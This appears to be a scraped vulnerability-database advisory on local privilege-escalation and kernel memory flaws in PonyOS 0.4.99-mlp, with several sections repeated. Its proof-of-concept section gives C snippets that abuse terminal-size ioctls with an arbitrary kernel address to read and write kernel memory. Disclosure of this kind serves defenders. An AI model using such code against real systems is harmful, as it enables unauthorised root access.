PonyOS Multiple Local Security Vulnerabilities
BID:58822
Info
PonyOS Multiple Local Security Vulnerabilities
| Bugtraq ID: | 58822 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | No |
| Local: | Yes |
| Published: | Apr 03 2013 12:00AM |
| Updated: | Apr 03 2013 12:00AM |
| Credit: | John Cartwright |
| Vulnerable: | |
| Not Vulnerable: | |
Discussion
PonyOS Multiple Local Security Vulnerabilities
PonyOS is prone to a local privilege-escalation, a local security bypass, and a format-string vulnerability.
An attacker can exploit these issues to execute arbitrary commands with root privileges to gain escalated privileges, read or write arbitrary data from or to kernel memory ,and execute arbitrary code in the context of the vulnerable application. Failed exploit attempts will likely result in a denial-of-service condition.
PonyOS 0.4.99-mlp is vulnerable; other versions may also be affected.
PonyOS is prone to a local privilege-escalation, a local security bypass, and a format-string vulnerability.
An attacker can exploit these issues to execute arbitrary commands with root privileges to gain escalated privileges, read or write arbitrary data from or to kernel memory ,and execute arbitrary code in the context of the vulnerable application. Failed exploit attempts will likely result in a denial-of-service condition.
PonyOS 0.4.99-mlp is vulnerable; other versions may also be affected.
Exploit / POC
PonyOS Multiple Local Security Vulnerabilities
The following example data is available:
struct winsize ws;
ioctl(0, TIOCSWINSZ, (void *)0x11223344);
ioctl(0, TIOCGWINSZ, &ws);
printf("%x %x %x %x\n", ws.ws_col, ws.ws_row, ws.ws_xpixel, ws.ws_ypixel);
struct winsize ws;
memset(&ws, '\0', sizeof(struct winsize));
ioctl(0, TIOCSWINSZ, &ws);
ioctl(0, TIOCGWINSZ, (void *)0x11223344);
The following example data is available:
struct winsize ws;
ioctl(0, TIOCSWINSZ, (void *)0x11223344);
ioctl(0, TIOCGWINSZ, &ws);
printf("%x %x %x %x\n", ws.ws_col, ws.ws_row, ws.ws_xpixel, ws.ws_ypixel);
struct winsize ws;
memset(&ws, '\0', sizeof(struct winsize));
ioctl(0, TIOCSWINSZ, &ws);
ioctl(0, TIOCGWINSZ, (void *)0x11223344);
Solution / Fix
PonyOS Multiple Local Security Vulnerabilities
Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
PonyOS Multiple Local Security Vulnerabilities
References:
References:
- Advisory: PonyOS Security Issues (Full Disclosure)
- PonyOS Homepage (PonyOS)